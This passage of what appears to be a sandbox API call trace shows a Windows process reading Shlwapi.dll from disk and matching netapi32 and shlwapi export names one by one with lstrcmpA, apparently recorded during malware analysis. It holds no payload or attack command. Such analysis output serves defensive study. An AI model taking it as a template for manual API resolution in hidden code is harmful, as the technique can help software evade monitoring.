lpString2="DavFlushFile") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0212.315] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0212.316] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0212.317] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0212.318] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0212.318] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0212.319] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0212.319] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0212.325] GetProcessHeap () returned 0x4a0000 [0212.326] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d55030 | out: hHeap=0x4a0000) returned 1 [0212.326] GetProcessHeap () returned 0x4a0000 [0212.326] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9040 [0212.326] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0212.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0212.326] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0212.327] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0212.327] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0212.327] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0212.327] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0212.327] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0212.328] GetProcessHeap () returned 0x4a0000 [0212.328] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x51148) returned 0x2d55030 [0212.328] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0212.328] ReadFile (in: hFile=0x17c, lpBuffer=0x2d55030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d55030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0212.334] CloseHandle (hObject=0x17c) returned 1 [0212.334] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0212.334] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0212.334] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0212.334] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0212.334] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0212.334] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0212.335] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0212.335] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0212.335] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0212.335] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0212.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0212.710] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0212.711] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0212.711] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0212.711] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0212.711] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0212.711] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0212.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0212.711] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0212.712] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0212.712] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0212.712] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0212.712] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0212.712] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0212.712] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0212.712] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0212.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0212.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0212.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0212.712] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0212.713] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0212.713] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0212.713] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0212.713] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0212.713] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0212.713] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0212.713] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0212.713] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0212.713] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0212.713] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0212.714] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0212.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0212.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0212.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0212.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0212.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0212.714] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0212.715] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0212.715] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0212.716] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0212.716] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0212.716] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0212.717] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0212.717] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0212.717] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0212.717] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0212.717] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0212.717] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0212.718] lstrcmpA 